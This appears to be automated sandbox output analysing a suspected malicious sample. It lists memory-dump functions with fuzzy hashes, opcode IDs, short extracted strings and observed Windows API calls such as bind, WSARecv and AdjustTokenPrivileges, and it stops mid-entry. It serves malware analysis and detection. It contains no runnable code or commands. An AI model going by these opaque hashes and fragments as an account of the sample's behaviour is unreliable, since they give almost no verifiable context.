Opcode Fuzzy Hash: 91892e0e7e18a8fc323f9735c57bd19b88e52b34e60b1d99dc6c02ff39468be5
Instruction Fuzzy Hash: 59B09BF7999127198B58F47434124BFE3448372111715ADBBDD07675916915885360DC

Uniqueness

Uniqueness Score: -1.00%

Function 00592B7F, Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2395263485.0000000000590000.00000040.00000001.sdmp, Offset: 00590000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 292a5a0011357a23c09b0491d76b1bd01237375da53e042a680a2ccc11b0eb1f
Instruction ID: c23cff844a631c0fe32210a5ccbe23ab51b8d5ddb19964dcbd913de10370ea31
Opcode Fuzzy Hash: 292a5a0011357a23c09b0491d76b1bd01237375da53e042a680a2ccc11b0eb1f
Instruction Fuzzy Hash: 72E0463091531A9FCB90DF24ED84BACBBBAFB08310F0024A9C409E6228EB305E84CF01

Uniqueness

Uniqueness Score: -1.00%

Function 00598CC3, Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2395263485.0000000000590000.00000040.00000001.sdmp, Offset: 00590000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 75145c8af3ad71151742a20fc479972ae71bcb32ffb30aa3cf3f9dd6d75473a9
Instruction ID: f1477a42bbc5022bb4f527da687c7d03442b71481d887200c5d66a4c35baa0ee
Opcode Fuzzy Hash: 75145c8af3ad71151742a20fc479972ae71bcb32ffb30aa3cf3f9dd6d75473a9
Instruction Fuzzy Hash: AAD0A774C040488FCF64CF60C8507EEB775BF06300F105686943AB3241CA300A01CF51

Uniqueness

Uniqueness Score: -1.00%

Function 005986C5, Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2395263485.0000000000590000.00000040.00000001.sdmp, Offset: 00590000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6164936b6c7f37853229d123deec6546551ab0e9c8842bc7326dbdd83474920
Instruction ID: a1b25a63670b31548782d958934f8b749e435acb47415258b6dc153537ffd08b
Opcode Fuzzy Hash: d6164936b6c7f37853229d123deec6546551ab0e9c8842bc7326dbdd83474920
Instruction Fuzzy Hash: A2D09278D182599EDF90CF90C881B9DB7FABB4A300F2098A5850EA7250DA709A94CF55

Uniqueness

Uniqueness Score: -1.00%

Function 005985B6, Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2395263485.0000000000590000.00000040.00000001.sdmp, Offset: 00590000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 31d9228a35e3b36bbe4b81331b0588e03ae86050affa79d247ee1bf4f1f40ba3
Instruction ID: f2296b1cde7589d6a10be05b22c524641d8efbab4ac199a286d082103e334cbf
Opcode Fuzzy Hash: 31d9228a35e3b36bbe4b81331b0588e03ae86050affa79d247ee1bf4f1f40ba3
Instruction Fuzzy Hash: 43D05278C08208CECF80CB91C441BAEB7B9AB45300F10D4A68109AB284DB308A84CF15

Uniqueness

Uniqueness Score: -1.00%

Function 00599226, Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2395263485.0000000000590000.00000040.00000001.sdmp, Offset: 00590000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c77891ae5c33a3cb234a63a7f121dce36cc2225b1aefd5f9e9f599daee428ad
Instruction ID: 9264c3581e43e4db2ebe91ec190a03a59176148f38aca283772a6cd337470e1e
Opcode Fuzzy Hash: 0c77891ae5c33a3cb234a63a7f121dce36cc2225b1aefd5f9e9f599daee428ad
Instruction Fuzzy Hash: B5C012B4C082188FCF80CF90C480BADB7BAAB46300F209096850DB3200CA308A84CF59

Uniqueness

Uniqueness Score: -1.00%

Function 00598AF5, Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2395263485.0000000000590000.00000040.00000001.sdmp, Offset: 00590000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 73155ca9c3a1cc9d570f079c87b6f296c7847df71b107ddb092631d6204214de
Instruction ID: 9ba5456e4cf284da4e908311e15cc787df7d6c805aaf1e5bb9f7b08f0cdf0bd1
Opcode Fuzzy Hash: 73155ca9c3a1cc9d570f079c87b6f296c7847df71b107ddb092631d6204214de
Instruction Fuzzy Hash: D4C08074C0411C8FCF40CF94D4407EDB775BB45300F109195500973240CB704A84CF51

Uniqueness

Uniqueness Score: -1.00%

Function 00594F33, Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2395263485.0000000000590000.00000040.00000001.sdmp, Offset: 00590000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 02d6beb7f649ede0312a6aa4c80959269ff0698ecf88f47cde17ac68b901c2ce
Instruction ID: 1b77e3d5354219175b206e56f08b099f148882db76c3baac0058ced9e2e08754
Opcode Fuzzy Hash: 02d6beb7f649ede0312a6aa4c80959269ff0698ecf88f47cde17ac68b901c2ce
Instruction Fuzzy Hash: 82D0C970506345CFC715DFB0D24484D7BB2BB4A361F500969E0069E254C735D982CF00

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00596B19, Relevance: 1.4, Strings: 1, Instructions: 138COMMON

Download Yara Rule

Strings

$;17, xrefs: 00596CDD

Memory Dump Source

Source File: 00000004.00000002.2395263485.0000000000590000.00000040.00000001.sdmp, Offset: 00590000, based on PE: false

Similarity

API ID:
String ID: $;17
API String ID: 0-1489653689
Opcode ID: 3859467f61c34a61045bc809f99832e8e4fc20396c014762b308c6ed9608b304
Instruction ID: 333cc64d44631088c89c3e71f787ae4c9349275255e81bf1bbe407fb9cf9ade9
Opcode Fuzzy Hash: 3859467f61c34a61045bc809f99832e8e4fc20396c014762b308c6ed9608b304
Instruction Fuzzy Hash: 2B51D4B0D0524ADFCF00CFA4C5815AEBFB2FB49300F2499AAD455B7241D734AB45DBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00596E40, Relevance: 1.4, Strings: 1, Instructions: 104COMMON

Download Yara Rule

Strings

OQT, xrefs: 00596E91

Memory Dump Source

Source File: 00000004.00000002.2395263485.0000000000590000.00000040.00000001.sdmp, Offset: 00590000, based on PE: false

Similarity

API ID:
String ID: OQT
API String ID: 0-2671719027
Opcode ID: 09f3bdaef2cc09255fe72e3777c04ac94abf993a8564649c2e2839250428b2c6
Instruction ID: 7959ff1b2c3dfe4c459af17c7d80d3d6816da956fa5a47e1829d0c0586a31272
Opcode Fuzzy Hash: 09f3bdaef2cc09255fe72e3777c04ac94abf993a8564649c2e2839250428b2c6
Instruction Fuzzy Hash: 18413275D0420A9FCF04CFA6C4814AEFBB5FF89300F24946AC851AB214D738AA46CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00596E50, Relevance: 1.3, Strings: 1, Instructions: 99COMMON

Download Yara Rule

Strings

OQT, xrefs: 00596E91

Memory Dump Source

Source File: 00000004.00000002.2395263485.0000000000590000.00000040.00000001.sdmp, Offset: 00590000, based on PE: false

Similarity

API ID:
String ID: OQT
API String ID: 0-2671719027
Opcode ID: e7f72a15cab042f46897c51068867d02ef9f61bf3a74c88f0c8d0f04156f6d43
Instruction ID: 607a987f2cc37ec12c8403bf6bce365a98fd52c9b3f131463ae30d91d100173d
Opcode Fuzzy Hash: e7f72a15cab042f46897c51068867d02ef9f61bf3a74c88f0c8d0f04156f6d43
Instruction Fuzzy Hash: 9B41F275D0420A9FCF04CFA6D5815EEFBB6BF89300F20986AC415BB254D738AA46CF94

Uniqueness

Uniqueness Score: -1.00%

Function 00297542, Relevance: .9, Instructions: 883COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2395079937.0000000000292000.00000040.00000001.sdmp, Offset: 00292000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1595eb58962641528e2c4c33af97a6fc0ae05d6eb6824b6fb2f91b710747cf1
Instruction ID: 23e481f3812ac1a7975483f27e05fc912f2dd31471b05831747500f1ea1b694c
Opcode Fuzzy Hash: e1595eb58962641528e2c4c33af97a6fc0ae05d6eb6824b6fb2f91b710747cf1
Instruction Fuzzy Hash: 2952F0A645E7C18FC7038B304C795907FB1AE2722870E85DFC4C58F8A3E299685AD767

Uniqueness

Uniqueness Score: -1.00%

Function 0059B5C8, Relevance: .2, Instructions: 231COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2395263485.0000000000590000.00000040.00000001.sdmp, Offset: 00590000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6b66d5ff13e275d01c36458d0402e2516c4efbac4de90b2b169f01679c05155d
Instruction ID: e0bb8624241a891d2af04a11c9d6968a9cbb3e801076f9c497e7eb8b4cfe7c01
Opcode Fuzzy Hash: 6b66d5ff13e275d01c36458d0402e2516c4efbac4de90b2b169f01679c05155d
Instruction Fuzzy Hash: DFA103B0D05209DBEF04DFE6D6809AEBBB2FF98310B20952AD415AB254D734AA41DF91

Uniqueness

Uniqueness Score: -1.00%

Function 00595E48, Relevance: .2, Instructions: 164COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2395263485.0000000000590000.00000040.00000001.sdmp, Offset: 00590000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7445522673f65d2ea55fda9afa13dfe1014f1239b26c2872b93a8c254f888088
Instruction ID: d0ce19d2e8d72e18ea6e6f1d5ee16076dd999c4e92dfb6ad07849ca3defb5cf4
Opcode Fuzzy Hash: 7445522673f65d2ea55fda9afa13dfe1014f1239b26c2872b93a8c254f888088
Instruction Fuzzy Hash: 4171ED74E25209EFCB41CFA9D58499DFBF1FF49310F2498AAE815AB220D734AA54CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0059BC68, Relevance: .2, Instructions: 164COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2395263485.0000000000590000.00000040.00000001.sdmp, Offset: 00590000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c2986cbbf908fa7f5a76f1ffb0790488c30f8dbd9c03f34388a5908f8b84ead0
Instruction ID: 3014ea83a9207bfa6e88e4f655207033a5e94b5e9df0d311e7e255c399fdfbc6
Opcode Fuzzy Hash: c2986cbbf908fa7f5a76f1ffb0790488c30f8dbd9c03f34388a5908f8b84ead0
Instruction Fuzzy Hash: 58711774D04258DBEF14DFAAC68449DFBB2FF89304B24C56AC418AB20AD7349A42DF94

Uniqueness

Uniqueness Score: -1.00%

Function 00595E58, Relevance: .2, Instructions: 163COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2395263485.0000000000590000.00000040.00000001.sdmp, Offset: 00590000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 660d8b0153d73c8830bfdc6813f432dbb9767a37aed4fc8a080452a8e9f95df6
Instruction ID: b9efabe15fe32bb60e5fc745e7d51db321e396c1fef2cab1d92046b75682e815
Opcode Fuzzy Hash: 660d8b0153d73c8830bfdc6813f432dbb9767a37aed4fc8a080452a8e9f95df6
Instruction Fuzzy Hash: 2171EB74E25209EFCB00CFA9D58499DFBF1FF49310F24999AE415AB224E738AA50CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00597038, Relevance: .2, Instructions: 152COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2395263485.0000000000590000.00000040.00000001.sdmp, Offset: 00590000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bcff9d2728f2b67904d0b0b3cb35d094fecf4835c03870c5247aa611671c0710
Instruction ID: e4e796666fbf1937181e49515046f452215bc35bf29f17f32388d91b3e79066a
Opcode Fuzzy Hash: bcff9d2728f2b67904d0b0b3cb35d094fecf4835c03870c5247aa611671c0710
Instruction Fuzzy Hash: E361D375D292099FCF04CFAAC5458AEFBF2FB89300F24996AD415BB214D3389A01DF54

Uniqueness

Uniqueness Score: -1.00%

Function 00597048, Relevance: .1, Instructions: 149COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2395263485.0000000000590000.00000040.00000001.sdmp, Offset: 00590000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c50ece615a406caa354bca225ebefb5628df86f90e3c45b6c3714d818eaa7236
Instruction ID: 25c1f0464d40f0bc133b4a2e03296a02072b9f28f0a656854b15daf816689f6a
Opcode Fuzzy Hash: c50ece615a406caa354bca225ebefb5628df86f90e3c45b6c3714d818eaa7236
Instruction Fuzzy Hash: A061C075D292199FCF04CFAAC5849AEFBF2FB89300F24996AD415BB214D3389A01DF54

Uniqueness

Uniqueness Score: -1.00%

Function 0059BA50, Relevance: .1, Instructions: 125COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2395263485.0000000000590000.00000040.00000001.sdmp, Offset: 00590000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 030a26727708215a1048db9a800689c25bf71da573ecd55d23a94a26cff0724d
Instruction ID: 7ff709c0c55d4218c3ddec8fa97079723658c2551d5dcb70c624dbae67e49089
Opcode Fuzzy Hash: 030a26727708215a1048db9a800689c25bf71da573ecd55d23a94a26cff0724d
Instruction Fuzzy Hash: 9D514970D002098BEF00DFAAD6806AEBBB2BF89320F24C569D455B7294D3389A409B61

Uniqueness

Uniqueness Score: -1.00%

Function 00597288, Relevance: .1, Instructions: 114COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2395263485.0000000000590000.00000040.00000001.sdmp, Offset: 00590000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e5126686510428e5496adc33eafa9a1467f2c81bb536c508bbbc610e64de22b5
Instruction ID: ad1871674d5e753b7682b27ebe973c0e0f690cdf28a23a4ca1fef0ac394ca434
Opcode Fuzzy Hash: e5126686510428e5496adc33eafa9a1467f2c81bb536c508bbbc610e64de22b5
Instruction Fuzzy Hash: 81410274D2920E9FCF04CFE5C5814AEFBB1FB89300F24986AD406AB254D3349B419B95

Uniqueness

Uniqueness Score: -1.00%

Function 00597298, Relevance: .1, Instructions: 110COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2395263485.0000000000590000.00000040.00000001.sdmp, Offset: 00590000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 692e743a39396c2a8fbed667560ec5711cf198a9a1488609b847d75e01d6f3ad
Instruction ID: f78b8073b80cb32ebcf4fa37e301ac1285f904ffa771f4ed3e84a13d09acb8fa
Opcode Fuzzy Hash: 692e743a39396c2a8fbed667560ec5711cf198a9a1488609b847d75e01d6f3ad
Instruction Fuzzy Hash: 6F41D074D2920EDBCF04CFE6C5815AEFBB2FB89300F24986AD416BB204D7349B419B95

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: RegSvcs.exe PID: 2360 Parent PID: 2636 RegSvcs.exeCOMMON

Executed Functions

Function 003FC6F3, Relevance: 4.0, Strings: 3, Instructions: 225COMMON

Download Yara Rule

Strings

(;|, xrefs: 003FC88E
*_qq, xrefs: 003FC767
, xrefs: 003FC833

Memory Dump Source

Source File: 00000005.00000002.2597293008.00000000003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: false

Similarity

API ID:
String ID: $(;|$*_qq
API String ID: 0-47537142
Opcode ID: 6aa390bf049b8b530294fdd5786efaf68eedda54a7418f5298b340cefa35351e
Instruction ID: 8f4b8932ef0ddb51e6683710cc12472a12022400253f50871aa6820b0844e874
Opcode Fuzzy Hash: 6aa390bf049b8b530294fdd5786efaf68eedda54a7418f5298b340cefa35351e
Instruction Fuzzy Hash: AC712572F5420C8FCB05EB79C9406BEBBB6EBC5310B25847AC216DB641DB358C06CB91

Uniqueness

Uniqueness Score: -1.00%

Function 003F38C8, Relevance: 3.4, Strings: 2, Instructions: 871COMMON

Download Yara Rule

Strings

*_qq, xrefs: 003F4095
*_qq, xrefs: 003F411A

Memory Dump Source

Source File: 00000005.00000002.2597293008.00000000003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: false

Similarity

API ID:
String ID: *_qq$*_qq
API String ID: 0-2058968588
Opcode ID: d116d31ba1936e6e2a9940e9547dd78332651e18de926b0822e09b8ee3c083c7
Instruction ID: 449bd339b222a3fbc7768f917c5f2a7ef4870ba1cb71fd42278ba06e1ec59be3
Opcode Fuzzy Hash: d116d31ba1936e6e2a9940e9547dd78332651e18de926b0822e09b8ee3c083c7
Instruction Fuzzy Hash: E4620871A0430ACFCB12DF68C8805BAFBB5FF85300B25C6AAD5499B256D770EE41CB91

Uniqueness

Uniqueness Score: -1.00%

Function 003F2418, Relevance: 3.0, Strings: 2, Instructions: 505COMMON

Download Yara Rule

Strings

_qq, xrefs: 003F2A3A
_qq, xrefs: 003F2739

Memory Dump Source

Source File: 00000005.00000002.2597293008.00000000003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: false

Similarity

API ID:
String ID: _qq$_qq
API String ID: 0-1484419985
Opcode ID: bbaf168f86d817ea5b0c222003e1b901e02ddc11882dcf86fa6f3b04d7fe2425
Instruction ID: 711ad7cb16438bd295f3d13e04561aeebb1631e768d9285fe92422d117a19211
Opcode Fuzzy Hash: bbaf168f86d817ea5b0c222003e1b901e02ddc11882dcf86fa6f3b04d7fe2425
Instruction Fuzzy Hash: 0212FE30A0021ACFCB16DF25C9906BEBBF6BF89304F25816ED5169B695DBB48D85CF40

Uniqueness

Uniqueness Score: -1.00%

Function 003F9120, Relevance: 3.0, Strings: 2, Instructions: 505COMMON

Download Yara Rule

Strings

_qq, xrefs: 003F9441
_qq, xrefs: 003F9742

Memory Dump Source

Source File: 00000005.00000002.2597293008.00000000003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: false

Similarity

API ID:
String ID: _qq$_qq
API String ID: 0-1484419985
Opcode ID: 19ce7344d25dbd8ef67ab4e2bfb8e6a4a2418891b6bfe1cb279bbb0545262d9a
Instruction ID: 5d8c4bd67ef3a5646600aa90195ad26bbceebc16c3312dd6553647b6cc27a367
Opcode Fuzzy Hash: 19ce7344d25dbd8ef67ab4e2bfb8e6a4a2418891b6bfe1cb279bbb0545262d9a
Instruction Fuzzy Hash: 5F12C930A0061ACFDB16DF25C884779B7FABF89314F26857BD1169B2AADB348C45DB40

Uniqueness

Uniqueness Score: -1.00%

Function 003FB7E0, Relevance: 3.0, Strings: 2, Instructions: 505COMMON

Download Yara Rule

Strings

_qq, xrefs: 003FBE02
_qq, xrefs: 003FBB01

Memory Dump Source

Source File: 00000005.00000002.2597293008.00000000003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: false

Similarity

API ID:
String ID: _qq$_qq
API String ID: 0-1484419985
Opcode ID: 68ccd57c95e6cc6ed47251bac34e1c18c64547106c7e8d703a7fd8348ff4b3e4
Instruction ID: f19650094003ead3d9f33ee4e269e8fb89b532f3c80c3ad6256907835e458caf
Opcode Fuzzy Hash: 68ccd57c95e6cc6ed47251bac34e1c18c64547106c7e8d703a7fd8348ff4b3e4
Instruction Fuzzy Hash: F212AAB0A00219CFDB15EF75D880A7DF7F6BB84300F65816EE6169B259DB789C82DB40

Uniqueness

Uniqueness Score: -1.00%

Function 003FC3E0, Relevance: 2.7, Strings: 2, Instructions: 239COMMON

Download Yara Rule

Strings

9|, xrefs: 003FC51A
9|, xrefs: 003FC3FF

Memory Dump Source

Source File: 00000005.00000002.2597293008.00000000003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: false

Similarity

API ID:
String ID: 9|$ 9|
API String ID: 0-229405549
Opcode ID: a2160ed3f59180c09c7d004160edcd536fe087547c8d09267dd44a1f149d01b2
Instruction ID: d7a9007316ddb36c90af3734d3a0cea81adccac356892f97694bc63a0e6f48ed
Opcode Fuzzy Hash: a2160ed3f59180c09c7d004160edcd536fe087547c8d09267dd44a1f149d01b2
Instruction Fuzzy Hash: 5081A132F211198BC715DB69D950A6EB7E7AFC8310F2AC079E406DB359DE34DD018B90

Uniqueness

Uniqueness Score: -1.00%

Function 003FEA80, Relevance: 2.2, Strings: 1, Instructions: 911COMMON

Download Yara Rule

Strings

r, xrefs: 003FF534

Memory Dump Source

Source File: 00000005.00000002.2597293008.00000000003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: false

Similarity

API ID:
String ID: r
API String ID: 0-1812594589
Opcode ID: 6198a4603acfe888000ee68a2577ff62956947aad71e74a6ce56b7303123379f
Instruction ID: ec3614f8fa181bd0a33514e597cf99940fe69ad4bd81bd155a1bb91b36d09cdc
Opcode Fuzzy Hash: 6198a4603acfe888000ee68a2577ff62956947aad71e74a6ce56b7303123379f
Instruction Fuzzy Hash: 5C825A74A00609CFCB15CF68C884AAEFBB2FF88310F15C569D95AAB651D734E981CF94

Uniqueness

Uniqueness Score: -1.00%

Function 004C25F3, Relevance: 1.6, APIs: 1, Instructions: 81networkCOMMON

Download Yara Rule

APIs

bind.WS2_32(?,00000E40,679C6D7E,00000000,00000000,00000000,00000000), ref: 004C2687

Memory Dump Source

Source File: 00000005.00000002.2597386906.00000000004C0000.00000040.00000001.sdmp, Offset: 004C0000, based on PE: false

Similarity

API ID: bind
String ID:
API String ID: 1187836755-0
Opcode ID: be8dcc353ddf0f3b54802d358ce3efe5cf497294df79aa2690477171f95cb5aa
Instruction ID: fdde8b821dd2c4db5cc98e3d4178a006ab1aac5080526d360225b4c4e026496e
Opcode Fuzzy Hash: be8dcc353ddf0f3b54802d358ce3efe5cf497294df79aa2690477171f95cb5aa
Instruction Fuzzy Hash: 0B216075509380AFE712CB61CC45F96BFB8EF46310F08849BE944DB292D269A909CB75

Uniqueness

Uniqueness Score: -1.00%

Function 004C0ED3, Relevance: 1.6, APIs: 1, Instructions: 75COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 004C0F53

Memory Dump Source

Source File: 00000005.00000002.2597386906.00000000004C0000.00000040.00000001.sdmp, Offset: 004C0000, based on PE: false

Similarity

API ID: AdjustPrivilegesToken
String ID:
API String ID: 2874748243-0
Opcode ID: 65140dba3931322d3ba77398e4b62fc4376212b3a1df34f80e68f02fac1117f5
Instruction ID: 70260fee8a86ba653c28a7d1fdd8575b5b6bc2d47945ae25876e3c8a7cfb24e2
Opcode Fuzzy Hash: 65140dba3931322d3ba77398e4b62fc4376212b3a1df34f80e68f02fac1117f5
Instruction Fuzzy Hash: 7F21BF765097809FEB228F25DC44B92BFB4EF16310F0884DAE9848B663D2759808CB62

Uniqueness

Uniqueness Score: -1.00%

Function 004C2B6E, Relevance: 1.6, APIs: 1, Instructions: 67networkCOMMON

Download Yara Rule

APIs

WSARecv.WS2_32(?,00000E40,679C6D7E,00000000,00000000,00000000,00000000), ref: 004C2BDE

Memory Dump Source

Source File: 00000005.00000002.2597386906.00000000004C0000.00000040.00000001.sdmp, Offset: 004C0000, based on PE: false

Similarity

API ID: Recv
String ID:
API String ID: 4192927123-0
Opcode ID: 3871cac16166984b4ed9b6ebca1af6c2216b2413afe5f0a2b3db1e1224f5fa1c
Instruction ID: 86eeeaf2dd5316ce9c82414f68997efbb7107bb085b7620966b1f0e7f0a76ea8
Opcode Fuzzy Hash: 3871cac16166984b4ed9b6ebca1af6c2216b2413afe5f0a2b3db1e1224f5fa1c
Instruction Fuzzy Hash: 9911CD76000704EFEB21CF50CD80FA6FBE8EF08310F04896AEA459A241D6B4E9058BB6

Uniqueness

Uniqueness Score: -1.00%

Function 004C110F, Relevance: 1.6, APIs: 1, Instructions: 64nativeCOMMON

Download Yara Rule

APIs

NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 004C1185

Memory Dump Source

Source File: 00000005.00000002.2597386906.00000000004C0000.00000040.00000001.sdmp, Offset: 004C0000, based on PE: false

Similarity

API ID: InformationQuerySystem
String ID:
API String ID: 3562636166-0
Opcode ID: 2b2beb02c9faf61268f42bdc457dd9c487118f0e529c47d97a691866da3169be
Instruction ID: 7db087e4cc451d8a5b5293f34d23c530c84d1796b26c6028cb5a223ea5f88a5b
Opcode Fuzzy Hash: 2b2beb02c9faf61268f42bdc457dd9c487118f0e529c47d97a691866da3169be
Instruction Fuzzy Hash: FC21DE754097C0AFDB238B20DC45A52FFB0EF17314F0D80DBE9848B163D269A919DB62

Uniqueness

Uniqueness Score: -1.00%

Function 004C2626, Relevance: 1.6, APIs: 1, Instructions: 62networkCOMMON

Download Yara Rule

APIs

bind.WS2_32(?,00000E40,679C6D7E,00000000,00000000,00000000,00000000), ref: 004C2687

Memory Dump Source

Source File: 00000005.00000002.2597386906.00000000004C0000.00000040.00000001.sdmp, Offset: 004C0000, based on PE: false

Similarity

API ID: bind
String ID:
API String ID: 1187836755-0
Opcode ID: 5fb599bb89bf9aa3b6afaed98669fbefdacc783cc24fd3f240520225b6b12cb4
Instruction ID: 116d57927d304f647fba064453d25808cf743921019c9d3297b823f4c4b02306
Opcode Fuzzy Hash: 5fb599bb89bf9aa3b6afaed98669fbefdacc783cc24fd3f240520225b6b12cb4
Instruction Fuzzy Hash: C111BF75600300EFEB20DF55CD85FA6FBE8EF04720F1484ABED099B241D6B4A904CAB6

Uniqueness

Uniqueness Score: -1.00%

Function 004C0F0A, Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 004C0F53

Memory Dump Source

Source File: 00000005.00000002.2597386906.00000000004C0000.00000040.00000001.sdmp, Offset: 004C0000, based on PE: false

Similarity

API ID: AdjustPrivilegesToken
String ID:
API String ID: 2874748243-0
Opcode ID: 4f6caf1d25e1143ee85d27242c1d71b935a4216b16e4f6a7103653ff402981d4
Instruction ID: bac1942f9183eaf0d0a58e30993d8e7562d7a0efb28234776f82ae5c39b22f11
Opcode Fuzzy Hash: 4f6caf1d25e1143ee85d27242c1d71b935a4216b16e4f6a7103653ff402981d4
Instruction Fuzzy Hash: 06119A36500700DFEB20CF55D884B62FBE4EF08320F0884AEED498B652D375E858DB62

Uniqueness

Uniqueness Score: -1.00%

Function 004C0BB6, Relevance: 1.5, APIs: 1, Instructions: 39COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNELBASE(?), ref: 004C0BE8

Memory Dump Source

Source File: 00000005.00000002.2597386906.00000000004C0000.00000040.00000001.sdmp, Offset: 004C0000, based on PE: false

Similarity

API ID: InfoSystem
String ID:
API String ID: 31276548-0
Opcode ID: e370412d90f915e20609dfa0a8084556fc4e315a41b848f42150f9bb9749ab9f
Instruction ID: b8f9c79860500ec0ee1cd51dc4aad32cfce5b0c8e8abb6519114e0e002a4d42f
Opcode Fuzzy Hash: e370412d90f915e20609dfa0a8084556fc4e315a41b848f42150f9bb9749ab9f
Instruction Fuzzy Hash: 8001AD79404744DFEB50CF55D885BA6FBA4EF04320F18C4ABDE088B206D279A844CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 004C114A, Relevance: 1.5, APIs: 1, Instructions: 38nativeCOMMON

Download Yara Rule

APIs

NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 004C1185

Memory Dump Source

Source File: 00000005.00000002.2597386906.00000000004C0000.00000040.00000001.sdmp, Offset: 004C0000, based on PE: false

Similarity

API ID: InformationQuerySystem
String ID:
API String ID: 3562636166-0
Opcode ID: 7fa669f557d0736fb7153a8a381cec40a3ccf7b699e9465fde935dc5a43c0bfd
Instruction ID: 7192060647e2c5aaf6b1038dabcabdedaa2edb7296372aa2b6ba112cafbd9d5c
Opcode Fuzzy Hash: 7fa669f557d0736fb7153a8a381cec40a3ccf7b699e9465fde935dc5a43c0bfd
Instruction Fuzzy Hash: 44018B35500740DFEB608F45D884B62FBA0EF59720F08C19EDE490B726D67AA418DB62

Uniqueness

Uniqueness Score: -1.00%

Function 003F3020, Relevance: .2, Instructions: 239COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2597293008.00000000003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a440f8629ede2f1694679b9bc6ef311b1ac0f8ba680889757e29aab774ae1b89
Instruction ID: de83108796d97ed45ec78c5a31b4aede4ea8829f94aaf464d79d1611e3b90eab
Opcode Fuzzy Hash: a440f8629ede2f1694679b9bc6ef311b1ac0f8ba680889757e29aab774ae1b89
Instruction Fuzzy Hash: 44819F32F1111A9BD704DBA9D950A6EB7E7AFC8310F2A8079E416EB365DE30DD018B90

Uniqueness

Uniqueness Score: -1.00%

Function 003F9D20, Relevance: .2, Instructions: 239COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2597293008.00000000003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 95bbc13ab93a794031884aee5d44a1193509e8f0ef8deb76fbc55cd277d1f6cb
Instruction ID: 5ee04f0d0196b432712856d90daf2e847889cfb7a284fe28d3411989eb344671
Opcode Fuzzy Hash: 95bbc13ab93a794031884aee5d44a1193509e8f0ef8deb76fbc55cd277d1f6cb
Instruction Fuzzy Hash: 87819132F1111A8BDB15DB69D880B6EB7E7AFC4311F2A8175E40ADB365DE30DC018B90

Uniqueness

Uniqueness Score: -1.00%

Function 003FA033, Relevance: 6.4, Strings: 5, Instructions: 189COMMON

Download Yara Rule

Strings

XN, xrefs: 003FA1F4
*_qq, xrefs: 003FA0A7
PWN, xrefs: 003FA1CE
, xrefs: 003FA173
hQ`, xrefs: 003FA0C1

Memory Dump Source

Source File: 00000005.00000002.2597293008.00000000003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: false

Similarity

API ID:
String ID: $ XN$*_qq$PWN$hQ`
API String ID: 0-2396306662
